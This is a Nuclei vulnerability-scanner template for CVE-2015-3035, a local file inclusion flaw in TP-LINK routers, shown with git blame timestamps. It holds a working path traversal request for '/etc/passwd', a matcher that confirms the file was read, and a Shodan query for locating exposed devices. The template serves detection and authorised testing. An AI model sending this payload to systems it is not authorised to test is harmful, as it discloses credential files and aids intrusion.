nuclei-templates/cves/2015/CVE-2015-3035.yaml

33 lines
827 B
YAML
Raw Normal View History

2022-09-18 09:05:59 +00:00
id: CVE-2015-3035
2022-09-18 09:05:59 +00:00
info:
name: Multiple TP-LINK Products Vulnerable - Local File Inclusion
2022-09-18 09:05:59 +00:00
author: 0x_Akoko
severity: high
description: |
Because of insufficient input validation, arbitrary local files can be disclosed. Files that include passwords and other sensitive information can be accessed.
2022-09-18 09:05:59 +00:00
reference:
- https://seclists.org/fulldisclosure/2015/Apr/26
- https://nvd.nist.gov/vuln/detail/CVE-2015-3035
classification:
cve-id: CVE-2015-3035
metadata:
verified: true
shodan-query: http.title:"TP-LINK"
2022-09-18 09:05:59 +00:00
tags: cve,cve2015,tplink,router,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/login/../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200